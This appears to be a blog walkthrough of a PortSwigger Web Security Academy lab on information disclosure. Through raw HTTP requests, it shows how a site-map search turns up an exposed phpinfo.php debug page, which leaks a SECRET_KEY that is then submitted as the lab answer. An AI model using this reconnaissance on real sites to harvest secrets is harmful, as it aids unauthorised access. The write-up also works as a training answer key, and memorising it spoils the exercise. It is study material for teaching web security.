Skip to content

chojnowski.it

Port Swigger Information disclosure on debug page

Port Swigger Information disclosure on debug page

Information disclosure on debug page¶

Solution¶

Open website: https://0a920081036d4379b0ab08a400df003d.web-security-academy.net/product?productId=1¶

GET /product?productId=1 HTTP/2
Host: 0a920081036d4379b0ab08a400df003d.web-security-academy.net
Cookie: session=I0k77IVanUSS8dvQRJL370ZXhpsLzdZW
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Referer: https://0a920081036d4379b0ab08a400df003d.web-security-academy.net/
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers

Open website: https://0a920081036d4379b0ab08a400df003d.web-security-academy.net/product?productId=b¶

GET /product?productId=b HTTP/2
Host: 0a920081036d4379b0ab08a400df003d.web-security-academy.net
Cookie: session=I0k77IVanUSS8dvQRJL370ZXhpsLzdZW
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers

Check "Site map" for the website¶

Found file: phpinfo.php
https://0a920081036d4379b0ab08a400df003d.web-security-academy.net/cgi-bin/phpinfo.php

Open website: https://0a920081036d4379b0ab08a400df003d.web-security-academy.net/cgi-bin/phpinfo.php¶

SECRET_KEY: itmmmwxpma7zawl4eb3t5xlay8lfqtx7
---
GET /cgi-bin/phpinfo.php HTTP/2
Host: 0a920081036d4379b0ab08a400df003d.web-security-academy.net
Cache-Control: max-age=0
Sec-Ch-Ua: "Google Chrome";v="143", "Not=A?Brand";v="8", "Chromium";v="143"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Linux"
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate, br

Submit solution¶

SECRET_KEY: itmmmwxpma7zawl4eb3t5xlay8lfqtx7
---
POST /submitSolution HTTP/2
Host: 0a920081036d4379b0ab08a400df003d.web-security-academy.net
Cookie: session=I0k77IVanUSS8dvQRJL370ZXhpsLzdZW
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: */*
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 39
Origin: https://0a920081036d4379b0ab08a400df003d.web-security-academy.net
Referer: https://0a920081036d4379b0ab08a400df003d.web-security-academy.net/product?productId=1
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=0
Te: trailers

answer=itmmmwxpma7zawl4eb3t5xlay8lfqtx7

Solved¶